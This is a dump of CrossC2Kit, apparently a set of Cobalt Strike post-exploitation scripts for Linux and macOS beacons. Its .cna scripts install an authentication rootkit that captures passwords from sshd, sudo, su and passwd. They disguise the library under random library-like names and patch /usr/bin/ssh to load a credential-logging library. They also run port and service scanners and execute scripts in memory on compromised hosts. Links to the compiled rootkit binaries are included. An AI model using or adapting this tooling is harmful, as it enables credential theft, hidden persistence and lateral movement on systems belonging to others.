-------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_module32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_module32.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_remove.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_remove.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_remove32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_remove32.so -------------------------------------------------------------------------------- /rootkit/auth/cc2_auth.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_auth { 5 | blog($1, "\nUsage: cc2_auth (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t, , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n"); 6 | } 7 | 8 | sub cc2_auth { 9 | $taskName = "cc2_auth"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "keystrokes"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $arch = $2; 15 | $chose = $3; 16 | $realPatchName = $4; 17 | $transportArg = "blankArg"; 18 | 19 | $patchlib = "rootkit/auth/auth_rootkit_module"; 20 | $loadlib = "rootkit/auth/auth_rootkit_mgr"; 21 | $removelib = "rootkit/auth/auth_rootkit_remove"; 22 | 23 | $os = lc(beacon_info($beaconid, "os")); 24 | $arch = beacon_info($beaconid, "arch"); 25 | 26 | if ('linux' isin $os) { 27 | if ($arch eq 'x64') { 28 | $patchlib = $patchlib.".so"; 29 | $loadlib = $loadlib.".so"; 30 | $removelib = $removelib.".so"; 31 | } else if ($arch eq 'x86') { 32 | $patchlib = $patchlib."32.so"; 33 | $loadlib = $loadlib."32.so"; 34 | $removelib = $removelib."32.so"; 35 | } 36 | } else if ('macos' isin $os) { 37 | $patchlib = $patchlib.".dylib"; 38 | $loadlib = $loadlib.".dylib"; 39 | $removelib = $removelib.".dylib"; 40 | } else { 41 | berror($beaconid, "*[error]: Only Linux/MacOS is supported for now."); 42 | printUsage_auth($beaconid); 43 | return; 44 | } 45 | $patchName = "libk5ccrypto1.0.4.so"; 46 | 47 | if ($chose eq "install") { 48 | $installPath = $4; 49 | $authPath = $5; 50 | blog($beaconid, "patch auth:"); 51 | $patchHead = @("pcre", "se", "kbr5", "k5c"); 52 | $patchBody = @("dl", "crypto", "resolv", "z"); 53 | $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3"); 54 | $patchEnd = ".so"; 55 | $patchName = "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd; 56 | blog($beaconid, "patch name: ".$patchName); 57 | $patchArg = $patchName."^"; 58 | if ($installPath && $authPath) { 59 | $patchArg = $patchArg.$installPath."^".$authPath; 60 | } 61 | 62 | bcrossc2_load_dyn($beaconid, "so", "cc2_auth_module", "info", $patchlib, $patchArg) 63 | } else if ($chose eq "run") { 64 | blog($beaconid, "get password for ssh login:"); 65 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 66 | } else if ($chose eq "uninstall") { 67 | $installPath = $4; 68 | bcrossc2_load_dyn($beaconid, "so", "cc2_remove_auth", "info", $removelib, $installPath."^"); 69 | } else { 70 | berror($beaconid, "*[error]: step type"); 71 | printUsage_auth($beaconid); 72 | } 73 | } 74 | 75 | ssh_alias("cc2_auth", &cc2_auth); 76 | 77 | ssh_command_register("cc2_auth", "CrossC2 auth rootkit - Get password for auth action(sshd/sudo/su/passwd...).", "\nUsage: cc2_auth (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t, , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n"); 78 | 79 | 80 | sub openAuthKitDialogCallBack { 81 | $patchRandName = $3['patchRandName']; 82 | $patchName = $3['patchName']; 83 | 84 | if (($patchName eq $null) && ($patchRandName eq $null)) { 85 | berror($bid, "error with patchName or patchRandName"); 86 | } else { 87 | $patch_name = ""; 88 | if ($patchName ne "") { 89 | $patch_name = $patchName; 90 | } else { 91 | $patch_name = $patchRandName; 92 | } 93 | $os = lc(beacon_info($bid, "os")); 94 | $arch = beacon_info($bid, "arch"); 95 | 96 | blog($bid, "cc2_auth install"); 97 | cc2_auth($bid, "", "install"); 98 | blog($bid, "cc2_auth run"); 99 | cc2_auth($bid, "", "run"); 100 | } 101 | } 102 | 103 | sub openAuthKitDialog { 104 | $bid = $1; 105 | $dialog = dialog("PAM auth log", %(bid => $bid, patchRandName => "libk5ccrypto1.0.4.so", patchName => ""), &openAuthKitDialogCallBack); 106 | dialog_description($dialog, "pam auth log"); 107 | 108 | $patchName = "libk5ccrypto1.0.4.so"; 109 | 110 | $patchHead = @("pcre", "se", "kbr5", "k5c"); 111 | $patchBody = @("dl", "crypto", "resolv", "z"); 112 | $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3"); 113 | $patchEnd = ".so"; 114 | 115 | @patchNameArray = @(); 116 | for ($x = 0; $x < 5; $x++) { 117 | push(@patchNameArray, "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd); 118 | } 119 | 120 | drow_text($dialog, "patchName", "patchName: "); 121 | drow_combobox($dialog, "patchRandName", "patchRandName: ", @patchNameArray); 122 | 123 | dbutton_action($dialog, "run"); 124 | dialog_show($dialog); 125 | } 126 | 127 | sub openAuthKitUninstallDialogCallBack { 128 | local('$patchName'); 129 | $patchName = $3['patchName']; 130 | 131 | blog($bid, "cc2_auth uninstall ".$patchName); 132 | cc2_auth($bid, "", "uninstall", $patchName); 133 | } 134 | 135 | sub openAuthKitUninstallDialog { 136 | $bid = $1; 137 | $dialog = dialog("PAM auth log uninstall", %(bid => $bid, patchName => ""), &openAuthKitUninstallDialogCallBack); 138 | dialog_description($dialog, "pam auth log uninstall"); 139 | 140 | drow_text($dialog, "patchName", "patchName: "); 141 | 142 | dbutton_action($dialog, "uninstall"); 143 | dialog_show($dialog); 144 | } 145 | 146 | 147 | sub cc2_auth_status { 148 | local('$bid $os $arch $system'); 149 | $bid = $1; 150 | $os = lc(beacon_info($bid, "os")); 151 | $arch = beacon_info($bid, "arch"); 152 | if ('linux' isin $os) { 153 | if ($arch eq 'x64') { 154 | return 'Linux64'; 155 | } else if ($arch eq 'x86') { 156 | return 'Linux32'; 157 | } 158 | } else if ('macos' isin $os) { 159 | return 'MacOS(intel)'; 160 | } 161 | return ''; 162 | } -------------------------------------------------------------------------------- /rootkit/auth/cc2_ssh.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_ssh { 5 | blog($1, "\nUsage: cc2_ssh (lib_name)\n\troot permissions\nssh rootkit: Get the password of ssh to log in to other targets.\n\tstep: \t, , , , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. patch: \tspecify the name of the dynamic library to patch.\n\tstep 3. run: \tstart running ssh rootkit.\n\tstep 4. uninstall: \tuninstall ssh rootkit.\n\tstep 5. clean: \tclean ssh rootkit.\nEx:\n\tcc2_ssh linux install\n\tcc2_ssh linux patch libxxx.0.0.1.so\n\tcc2_ssh linux run\n\tcc2_ssh linux uninstall libxxx.0.0.1.so\n\tcc2_ssh linux clean libxxx.0.0.1.so\n"); 6 | } 7 | 8 | sub cc2_ssh { 9 | $taskName = "cc2_ssh"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "keystrokes"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $arch = $2; 15 | $chose = $3; 16 | $realPatchName = $4; 17 | $transportArg = "blankArg"; 18 | 19 | if ($arch eq "linux32") { 20 | $patchlib = "rootkit/auth/ssh_rootkit_module32.so"; 21 | $patch = "patch/libpatchelf32.so"; 22 | $loadlib = "rootkit/auth/ssh_rootkit_mgr32.so"; 23 | $patchType = "so"; 24 | } else if ($arch eq "linux") { 25 | $patchlib = "rootkit/auth/ssh_rootkit_module.so"; 26 | $patch = "patch/libpatchelf.so"; 27 | $loadlib = "rootkit/auth/ssh_rootkit_mgr.so"; 28 | $patchType = "so"; 29 | } else if ($arch eq "osx") { 30 | $patchlib = "rootkit/auth/ssh_rootkit.dylib"; 31 | $patch = "install_name_tool"; 32 | $loadlib = "rootkit/auth/ssh_rootkit_mgr.dylib"; 33 | $patchType = "MachO"; 34 | } else { 35 | berror($beaconid, "*[error]: Only Linux/MacOS is supported for now."); 36 | printUsage_ssh($beaconid); 37 | return; 38 | } 39 | $patchName = "libk5ccrypto1.0.4.so"; 40 | 41 | if ($chose eq "install") { 42 | blog($beaconid, "patch ssh:"); 43 | $patchHead = @("pcre", "se", "kbr5", "k5c"); 44 | $patchBody = @("dl", "crypto", "resolv", "z"); 45 | $patchVer = @("1.0.4", "1.5.1.2", "1.2.1.3"); 46 | if ($patchType eq "so") { 47 | $patchEnd = ".so"; 48 | } else { 49 | $patchEnd = ".dylib"; 50 | } 51 | $patchName = "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd; 52 | blog($beaconid, "patch name: ".$patchName); 53 | 54 | bcrossc2_load_dyn($beaconid, "so", "cc2_ssh_module", "info", $patchlib, $patchName."^") 55 | } else { 56 | $patchName = $realPatchName; 57 | if ($chose eq "patch") { 58 | if ($patchType eq "so") { 59 | $patchArg = "--add-needed^".$patchName."^/usr/bin/ssh"; 60 | bcrossc2_load_dyn($beaconid, "so", "cc2_patch", "info", $patch, $patchArg); 61 | } else if ($patch eq "MachO") { 62 | $patchArg = "-add_rpath^".$patchName; 63 | bcrossc2_load_dyn($beaconid, "MachO", "cc2_patch", "info", $patch, $patchArg); 64 | } 65 | } else if ($chose eq "run") { 66 | blog($beaconid, "get password for ssh login:"); 67 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 68 | } else if ($chose eq "uninstall") { 69 | if ($patchType eq "so") { 70 | $patchArg = "--remove-needed^".$patchName."^/usr/bin/ssh"; 71 | bcrossc2_load_dyn($beaconid, "so", "cc2_patch", "info", $patch, $patchArg); 72 | } else if ($patch eq "MachO") { 73 | $patchArg = "-delete_rpath^".$patchName; 74 | bcrossc2_load_dyn($beaconid, "MachO", "cc2_patch", "info", $patch, $patchArg); 75 | } 76 | } else if ($chose eq "clean") { 77 | bshell($beaconid, "rm -f /usr/lib/".$patchName); 78 | } else { 79 | berror($beaconid, "*[error]: step type"); 80 | printUsage_ssh($beaconid); 81 | } 82 | } 83 | } 84 | 85 | ssh_alias("cc2_ssh", &cc2_ssh); 86 | 87 | ssh_command_register("cc2_ssh", "CrossC2 SSH rootkit - Get the password of ssh to log in to other targets.", "\nUsage: cc2_ssh (lib_name)\n\troot permissions\nssh rootkit: Get password for ssh login.\n\tstep: \t, , , , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. patch: \tspecify the name of the dynamic library to patch.\n\tstep 3. run: \tstart running ssh rootkit.\n\tstep 4. uninstall: \tuninstall ssh rootkit.\n\tstep 5. clean: \tclean ssh rootkit.\nEx:\n\tcc2_ssh linux install\n\tcc2_ssh linux patch libxxx.0.0.1.so\n\tcc2_ssh linux run\n\tcc2_ssh linux uninstall libxxx.0.0.1.so\n\tcc2_ssh linux clean libxxx.0.0.1.so\n"); 88 | 89 | sub openSSHKitDialogCallBack { 90 | $patchRandName = $3['patchRandName']; 91 | $patchName = $3['patchName']; 92 | 93 | if (($patchName eq $null) && ($patchRandName eq $null)) { 94 | berror($bid, "error with patchName or patchRandName"); 95 | } else { 96 | $patch_name = ""; 97 | if ($patchName ne "") { 98 | $patch_name = $patchName; 99 | } else { 100 | $patch_name = $patchRandName; 101 | } 102 | $os = lc(beacon_info($bid, "os")); 103 | $arch = beacon_info($bid, "arch"); 104 | 105 | blog($bid, "cc2_auth install"); 106 | cc2_auth($bid, "", "install"); 107 | blog($bid, "cc2_auth run"); 108 | cc2_auth($bid, "", "run"); 109 | } 110 | } 111 | 112 | sub openSSHKitDialog { 113 | $bid = $1; 114 | $dialog = dialog("PAM auth log", %(bid => $bid, patchRandName => "libk5ccrypto1.0.4.so", patchName => ""), &openSSHKitDialogCallBack); 115 | dialog_description($dialog, "pam auth log"); 116 | 117 | $patchName = "libk5ccrypto1.0.4.so"; 118 | 119 | $patchHead = @("pcre", "se", "kbr5", "k5c"); 120 | $patchBody = @("dl", "crypto", "resolv", "z"); 121 | $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3"); 122 | $patchEnd = ".so"; 123 | 124 | @patchNameArray = @(); 125 | for ($x = 0; $x < 5; $x++) { 126 | push(@patchNameArray, "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd); 127 | } 128 | 129 | drow_text($dialog, "patchName", "patchName: "); 130 | drow_combobox($dialog, "patchRandName", "patchRandName: ", @patchNameArray); 131 | 132 | dbutton_action($dialog, "run"); 133 | dialog_show($dialog); 134 | } 135 | 136 | sub openSSHKitUninstallDialogCallBack { 137 | $patchName = $3['patchName']; 138 | 139 | cc2_auth($bid, "", "uninstall", $patchName); 140 | } 141 | 142 | sub openSSHKitUninstallDialog { 143 | $bid = $1; 144 | $dialog = dialog("PAM auth log uninstall", %(bid => $bid, patchName => ""), &openSSHKitUninstallDialogCallBack); 145 | dialog_description($dialog, "pam auth log uninstall"); 146 | 147 | drow_text($dialog, "patchName", "patchName: "); 148 | 149 | dbutton_action($dialog, "uninstall"); 150 | dialog_show($dialog); 151 | } 152 | 153 | 154 | sub cc2_ssh_status { 155 | local('$bid $os $arch $system'); 156 | $bid = $1; 157 | $os = lc(beacon_info($bid, "os")); 158 | $arch = beacon_info($bid, "arch"); 159 | if ('linux' isin $os) { 160 | if ($arch eq 'x64') { 161 | return 'Linux64'; 162 | } else if ($arch eq 'x86') { 163 | return 'Linux32'; 164 | } 165 | } else if ('macos' isin $os) { 166 | return 'MacOS(intel)'; 167 | } 168 | return ''; 169 | } -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit.dylib -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr.dylib -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr32.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_module.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_module.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_module32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_module32.so -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/portscan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/portscan -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/portscan386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/portscan386 -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/serverscan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/serverscan -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/serverscan386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/serverscan386 -------------------------------------------------------------------------------- /scanner/ServerScan/linux/SO/crossc2_portscan.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/SO/crossc2_portscan.so -------------------------------------------------------------------------------- /scanner/ServerScan/linux/SO/crossc2_serverscan.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/SO/crossc2_serverscan.so -------------------------------------------------------------------------------- /scanner/ServerScan/serverscan.cna: -------------------------------------------------------------------------------- 1 | # include(script_resource("CrossC2Kit.cna")); 2 | 3 | sub printUsage_portscan_dyn { 4 | blog($1, "cc2_portscan_dyn\nby: trim\nUsage: cc2_portscan_dyn \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 5 | } 6 | 7 | sub printUsage_ServerScan_dyn { 8 | blog($1, "cc2_serverscan_dyn\nby: trim\nUsage: cc2_serverscan_dyn \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 9 | } 10 | 11 | sub printUsage_portscan { 12 | blog($1, "cc2_portscan\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 13 | } 14 | 15 | sub printUsage_ServerScan { 16 | blog($1, "cc2_serverscan\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 17 | } 18 | 19 | ssh_alias cc2_portscan_dyn { 20 | $taskName = "cc2_portscan"; 21 | $taskType = "so"; 22 | $taskResType = "portscan"; 23 | 24 | $beaconid = $1; 25 | $arch = $2; 26 | $host = $3; 27 | $port = $4; 28 | $scan_type = $5; 29 | $transportArg = $host . "^" . $port . "^" . $scan_type; 30 | 31 | if ($arch eq "osx") { 32 | $loadlib = "scanner/ServerScan/osx/crossc2_portscan.dylib"; 33 | } else if ($arch eq "linux32") { 34 | $loadlib = "scanner/ServerScan/linux/SO/crossc2_portscan386.so"; 35 | } else if ($arch eq "linux") { 36 | $loadlib = "scanner/ServerScan/linux/SO/crossc2_portscan.so"; 37 | } else { 38 | berror($beaconid, "*[error]: system"); 39 | printUsage_portscan_dyn($beaconid); 40 | return; 41 | } 42 | if ($host && $port && $scan_type) { 43 | blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type); 44 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 45 | } else { 46 | printUsage_portscan_dyn($beaconid); 47 | } 48 | 49 | } 50 | 51 | ssh_command_register("cc2_portscan_dyn", "CrossC2 PortScan Dyn(3.8M) - Scan a network for open services", "\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 52 | 53 | ssh_alias cc2_serverscan_dyn { 54 | $taskName = "cc2_serverscan"; 55 | $taskType = "so"; 56 | $taskResType = "portscan"; 57 | 58 | $beaconid = $1; 59 | $arch = $2; 60 | $host = $3; 61 | $port = $4; 62 | $scan_type = $5; 63 | $transportArg = $host . "^" . $port . "^" . $scan_type; 64 | 65 | if ($arch eq "osx") { 66 | $loadlib = "scanner/ServerScan/osx/cc2_serverscan.dylib"; 67 | } else if ($arch eq "linux32") { 68 | $loadlib = "scanner/ServerScan/linux/SO/crossc2_serverscan386.so"; 69 | } else if ($arch eq "linux") { 70 | $loadlib = "scanner/ServerScan/linux/SO/crossc2_serverscan.so"; 71 | } else { 72 | berror($beaconid, "*[error]: system"); 73 | printUsage_ServerScan_dyn($beaconid); 74 | return; 75 | } 76 | if ($host && $port && $scan_type) { 77 | blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type); 78 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 79 | } else { 80 | printUsage_ServerScan_dyn($beaconid); 81 | } 82 | 83 | } 84 | 85 | ssh_command_register("cc2_serverscan_dyn", "CrossC2 ServerScan Dyn(9.8M) - Scan a network for open services and services version detection", "\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 86 | 87 | 88 | 89 | # ELF / MachO 90 | ssh_alias cc2_portscan { 91 | $taskName = "cc2_portscan"; 92 | $taskType = "ELF"; 93 | $taskResType = "portscan"; 94 | 95 | $beaconid = $1; 96 | $arch = $2; 97 | $host = $3; 98 | $port = $4; 99 | $scan_type = $5; 100 | $transportArg = $host . "^" . $port . "^" . $scan_type; 101 | 102 | if ($arch eq "osx") { 103 | $loadlib = "scanner/ServerScan/osx/portscan"; 104 | } else if ($arch eq "linux32") { 105 | $loadlib = "scanner/ServerScan/linux/ELF/portscan386"; 106 | } else if ($arch eq "linux") { 107 | $loadlib = "scanner/ServerScan/linux/ELF/portscan"; 108 | } else { 109 | berror($beaconid, "*[error]: system"); 110 | printUsage_portscan($beaconid); 111 | return; 112 | } 113 | if ($host && $port && $scan_type) { 114 | blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type); 115 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 116 | } else { 117 | printUsage_portscan($beaconid); 118 | } 119 | 120 | } 121 | 122 | ssh_command_register("cc2_portscan", "CrossC2 PortScan(1.1M) - Scan a network for open services, but it will be seen in the process", "\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 123 | 124 | ssh_alias cc2_serverscan { 125 | $taskName = "cc2_serverscan"; 126 | $taskType = "ELF"; 127 | $taskResType = "portscan"; 128 | 129 | $beaconid = $1; 130 | $arch = $2; 131 | $host = $3; 132 | $port = $4; 133 | $scan_type = $5; 134 | $transportArg = $host . "^" . $port . "^" . $scan_type; 135 | 136 | if ($arch eq "osx") { 137 | $loadlib = "scanner/ServerScan/osx/serverscan"; 138 | } else if ($arch eq "linux32") { 139 | $loadlib = "scanner/ServerScan/linux/SO/serverscan386"; 140 | } else if ($arch eq "linux") { 141 | $loadlib = "scanner/ServerScan/linux/SO/serverscan"; 142 | } else { 143 | berror($beaconid, "*[error]: system"); 144 | printUsage_ServerScan($beaconid); 145 | return; 146 | } 147 | if ($host && $port && $scan_type) { 148 | blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type); 149 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 150 | } else { 151 | printUsage_ServerScan($beaconid); 152 | } 153 | 154 | } 155 | 156 | ssh_command_register("cc2_serverscan", "CrossC2 ServerScan(3M) - Scan a network for open services and services version detection, but it will be seen in the process", "\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp"); 157 | 158 | -------------------------------------------------------------------------------- /script/python-import.cna: -------------------------------------------------------------------------------- 1 | 2 | #include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_importscript { 5 | blog($1, "\nUsage: import"); 6 | } 7 | 8 | ssh_alias python-import { 9 | $taskResType = "info"; # info -> normal message 10 | 11 | $beaconid = $1; 12 | $scriptType = 'python-import$'; 13 | $scriptEnginePath = 'null'; 14 | $scriptLocalPath = $2; 15 | $transportArg = ''; 16 | 17 | $pathIndex = lindexOf($scriptLocalPath, '/'); 18 | $pathIndex += 1; 19 | $filename = substr($scriptLocalPath, $pathIndex); 20 | 21 | $importName = substr($filename, 0, lindexOf($filename, '.')); 22 | blog($1, "[Python]: import ".$importName); 23 | $scriptType = $scriptType.$importName; 24 | 25 | if ($scriptType && $scriptLocalPath) { 26 | if (indexOf($scriptType, "/")) { 27 | $scriptEnginePath = $scriptType; 28 | } 29 | brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, $transportArg); 30 | } else { 31 | berror($beaconid, "*[error]: error script load"); 32 | printUsage_importscript($beaconid); 33 | } 34 | } 35 | 36 | ssh_command_register("python-import", "aaa\n"); 37 | -------------------------------------------------------------------------------- /script/runScript.cna: -------------------------------------------------------------------------------- 1 | 2 | #include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_script { 5 | blog($1, "\nUsage: cc2_script [|] \n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t\t\tpython/bash/perl/ruby\n\t\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n"); 6 | } 7 | 8 | ssh_alias cc2_script { 9 | $taskResType = "info"; # info -> normal message 10 | 11 | $beaconid = $1; 12 | $scriptType = $2; 13 | $scriptEnginePath = 'null'; 14 | $scriptLocalPath = $3; 15 | $transportArg = $4; 16 | 17 | 18 | if ($scriptType && $scriptLocalPath && $transportArg) { 19 | if (indexOf($scriptType, "/")) { 20 | $scriptEnginePath = $scriptType; 21 | } 22 | brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, $transportArg); 23 | } else { 24 | berror($beaconid, "*[error]: error script load"); 25 | printUsage_script($beaconid); 26 | } 27 | 28 | } 29 | 30 | ssh_command_register("cc2_script", "CrossC2 Script - run scripts in memory", "\nUsage: cc2_script [|] \n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t\t\tpython/bash/perl/ruby\n\t\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n"); 31 | 32 | 33 | ssh_alias python { 34 | $taskResType = "info"; # info -> normal message 35 | CrossC2MemScriptEng("python", $taskResType, @_); 36 | } 37 | 38 | ssh_command_register("python", "CrossC2 Python Script - run script in memory", "\nUsage: python [|] \n\tpython c:\\getsysteminfo.py \n\tpython import os; os.system('whoami')\n"); 39 | 40 | 41 | ssh_alias bash { 42 | $taskResType = "info"; # info -> normal message 43 | CrossC2MemScriptEng("bash", $taskResType, @_); 44 | } 45 | 46 | ssh_alias zsh { 47 | $taskResType = "info"; # info -> normal message 48 | CrossC2MemScriptEng("zsh", $taskResType, @_); 49 | } 50 | 51 | ssh_command_register("bash", "CrossC2 Bash Script - run script in memory", 